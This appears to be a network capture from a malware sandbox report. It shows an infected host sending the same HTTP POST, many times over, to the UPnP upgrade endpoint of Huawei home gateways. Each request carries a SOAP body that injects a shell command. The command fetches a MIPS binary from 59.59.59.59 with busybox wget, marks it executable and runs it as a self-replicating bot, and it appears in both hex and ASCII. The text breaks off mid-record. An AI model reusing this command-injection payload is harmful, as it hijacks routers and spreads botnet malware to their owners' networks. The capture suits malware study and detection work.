                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1602192.168.2.1536298157.75.176.1637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.877612114 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1603192.168.2.153769448.174.231.16937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.877684116 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1604192.168.2.155023640.78.108.3737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.877706051 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1605192.168.2.1559170157.253.151.19437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.877724886 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1606192.168.2.1549494197.195.19.21037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.877743006 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1607192.168.2.1547290157.20.87.8637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.877768993 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1608192.168.2.154848061.245.250.23937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.877788067 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1609192.168.2.1550222188.25.90.5637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.877813101 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1610192.168.2.1557710157.179.141.3937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.883410931 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1611192.168.2.153686441.117.17.16637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.883429050 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 